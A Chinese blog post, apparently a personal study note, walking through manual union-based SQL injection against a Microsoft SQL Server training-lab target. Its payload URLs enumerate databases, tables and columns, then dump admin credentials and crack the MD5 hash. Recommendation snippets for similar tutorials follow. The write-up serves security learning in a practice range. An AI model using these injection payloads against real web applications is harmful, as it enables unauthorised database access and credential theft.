个人学习笔记之手工注入测试(Microsoft SQL Server)

最新推荐文章于 2024-05-20 14:23:56 发布
最新推荐文章于 2024-05-20 14:23:56 发布
阅读量1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44926231/article/details/94024177
版权

个人学习笔记之手工注入测试(Microsoft SQL Server)

启动环境:https://www.mozhe.cn/bug/detail/90

在这里插入图片描述

找到注入点

http://219.153.49.228:41537/new_list.asp?id=2-0 返回正常
http://219.153.49.228:41537/new_list.asp?id=2‘ 报错
在这里插入图片描述

判断字段

http://219.153.49.228:41537/new_list.asp?id=2 order by 10 报错
http://219.153.49.228:41537/new_list.asp?id=2 order by 5 报错
http://219.153.49.228:41537/new_list.asp?id=2 order by 3 正常
http://219.153.49.228:41537/new_list.asp?id=2 order by 4 正常
在这里插入图片描述
由此我们可以判断:字段数为4。

判断可以显示信息的位置

因为数据库为sqlsever,所以我们注入用null,不用数字填充,因为数字填充可能会版本不兼容而报错。
http://219.153.49.228:41537/new_list.asp?id=2 union all select null,null,null,null (这里使用union select 会报错)

  1. union 对两个结果集进行并集操作,重复数据只显示一次
  2. union all,对两个结果集进行并集操作,重复数据全部显示
    在这里插入图片描述

这里找到2 3 位置可以回显信息。

查看数据库

http://219.153.49.228:41537/new_list.asp?id=-2 union all select 1,(select top 1 name from master…sysdatabases where dbid>4),‘aa’,null
这里条件语句写法where dbid>4,是因为Microsoft SQL Server自带四个系统数据库。
在这里插入图片描述
我们来查一下试试:)
dbid>1
在这里插入图片描述
dbid>2
在这里插入图片描述结果正是如此。

这里还有一种方法可以直接爆出所有数据库。219.153.49.228:41537/new_list.asp?id=-2 union all select 1,(select name from master…sysdatabases for xml path),‘aa’,null
在这里插入图片描述

查看表

http://219.153.49.228:41537/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=‘u’ ),‘aa’,null
查询数据库mozhe_db_v2里第一条记录。
在这里插入图片描述
查询第二个表名:
http://219.153.49.228:41537/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u’and name <> (‘manage’) ),‘aa’,null
name <> (‘manage’)名字不等于manage的表。
在这里插入图片描述

http://219.153.49.228:41537/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u’and name <> ‘manage’ and name <>‘announcement’ ),‘aa’,null

name <> ‘manage’ and name <>‘announcement’ 查询 表字不等于manage,announcement的表。
在这里插入图片描述
这里显示空,表示数据库里就只有两张表。

查看字段

http://219.153.49.228:41537/new_list.asp?id=-2 union all select 1,db_name(),(select top 1 col_name(object_id(‘manage’),1) from sysobjects),null
在这里插入图片描述
http://219.153.49.228:41537/new_list.asp?id=-2 union all select 1,db_name(),(select top 1 col_name(object_id(‘manage’),2) from sysobjects),null
在这里插入图片描述
http://219.153.49.228:41537/new_list.asp?id=-2 union all select 1,db_name(),(select top 1 col_name(object_id(‘manage’),3) from sysobjects),null
在这里插入图片描述

查看数据

http://219.153.49.228:41537/new_list.asp?id=-2 union all select null,username, password ,null from manage

在这里插入图片描述
得到用户名: admin_mz 密码:72e1bfc3f01b7583(md5加密)
解密
在这里插入图片描述
登陆得到key
在这里插入图片描述

康纳倒拔垂杨柳
关注
SQL server手工注入入门
无心的博客
10-27 2686
目录 0x01 SQL server基础 0x02 基本注入 SQL server部分版本已被黑客安装后门,详情请在文末查看。 0x01 SQL server基础 在学习注入之前,最重要的是要先了解SQL server的具体的东西,才能更好的进行注入操作 系统库 master master数据库控制SQLserver的所有方面,这个数据库中包含所有的配置信息、用户登陆信息、当前正在服务器运行...
[红日安全]学习笔记1—SQL注入实战攻防(SQLMap、DVWA、Pikachu)
ISNS的博客
04-21 1560
最近和同学聊天: 是我太菜。
SQL手工注入完全篇
09-08
SQL手工注入完全篇
Sql Server数据库手工注入
内心不种满鲜花就会长满杂草
06-13 5456
目录 Sql Server Sql Server数据库的查询语句 union注入 延时注入 这里感谢墨者学院提供的靶场:https://www.mozhe.cn/bug/detail/90 Sql Server SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 -- 。 QLServer有三个权限级别: sa权限:数据库操作,文件管理,命令执行,注册表读取等system。.
手工SQL注入教程
xdy3008的专栏
11-06 2875
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。 SQL注入的原理,就是从客户端
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 5827
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库的注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
手工注入测试(MySQL
weixin_44926231的博客
06-25 761
个人学习笔记手工注入测试 环境:https://www.mozhe.cn/bug/detail/82 环境:Nginx+PHP+MySQL 这是墨者学院的一个测试题,让我们用手工的方式对数据库进行注入得到信息登陆,拿到key。 注入原理 参数用户可控。 参数未过滤就带入数据库查询。 凡是满足这两点,皆可产生注入漏洞,攻击者进一步构造payload进行拼接sql语句导致数据泄露,甚至网站、服务...
小迪安全第15天 web漏洞,SQL注入之Oracle,mongoDB等注入
qq_46116117的博客
12-23 2705
15 web漏洞,SQL注入之Oracle,mongoDB等注入 补充: json JSON数据与常规数据的数据表达形式不同 常规注入,在a=1后直接进行测试 JSON注入,需要在JSON数据中进行测试 简要学习各种数据库的注入特点 常见数据库: Access,Mysql,mssql,mongoDB,postgresqlsqlite,oracle,sybase等 Access 表名 列名 数据 Acce
sqlmap学习笔记
Zasen_的博客
06-05 530
ps:学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap的使用。 sqlmap简介 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3.基于报错注入,即页面会返回错误信息,或者把注入的...
(最全干货分享)渗透测试全流程归纳总结之三
深入交流学习:webMsec
04-19 452
0x01 主动探测 从管理员和用户的角度了解整个WEB应用乃至整个目标的全貌,主动探测会暴露ip以及留下日志信息,所以要… 1.主动扫描 1.1常见服务漏洞 nmap的功能:     脚本扫描,隐蔽扫描,端口扫描,服务识别,OS识别,探测WAF   nmap脚本主要分为以下几类,在扫描时可根据需要设置   --script=类别这种方式进行比较笼统的扫描: auth: 负责处理鉴权证书(绕开鉴权)的脚本     broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服
Mysql手工注入
09-16
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
sql手工注入
橙子的博客
01-02 763
原理 利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 重点部份手工注入网站: 1:开发一个注入网页漏洞。(产生机理…,如何去挖掘一个网站注入漏洞) A:创建数据库的后台(加入数据) mysql> create database infor...
手工SQL注入式脚本整理
传说中的蒙面大侠
01-17 1428
        1.判断是否有注入;and 1=1 ;and 1=2          2.初步判断是否是mssql ;and user>0   3.注入参数是字符and [查询条件] and =   4.搜索时没过滤参数的and [查询条件] and %25=   5.判断数据库系统   ;and (select count(*) from sysob
SQL手工注入
最新发布
wbplife的博客
05-20 1002
id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)) --+ 第一个字段名的的第一个字母。输入 'and 1=1 --+ 时,页面正常,输入'and 1=2 --+后,页面不正常,则时存在注入,并且是单引号闭合的字符型注入
SQL手工注入漏洞测试(MySQL数据库)
qq_61861243的博客
12-25 930
(2)、可能存在注入,随意填写(说明id =1 后边有注入点)(拼写的语句是为了测试你写的语句有没有带入到数据库执行,有影响说明带入数据库查询,所以 说明有注入点。这里我们得到一个用户名,还有一串数字,我们根据靶场提示,可知利用md5解密然后我们登录发现并不对,后来经过查找才知道上边的语句只显示第一行数据。(1)、注入点的判断方式 and 1=1 页面正常 and 1=2 页面错误。⑨、果然利用第二种方法查找的密码是正确的,接下来我们将靶场拿下拿到我们所需要提交的KEY。
SQL Server学习笔记:主键设置与SQL语句应用
"SQL Server学习总结.docx" 在学习SQL Server时,掌握其基本操作和常见问题的解决方法至关重要。这份文档详细总结了SQL Server 2012的一些关键点,包括界面、主键设置、SQL语句使用、表操作问题、数据库备份与还原...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值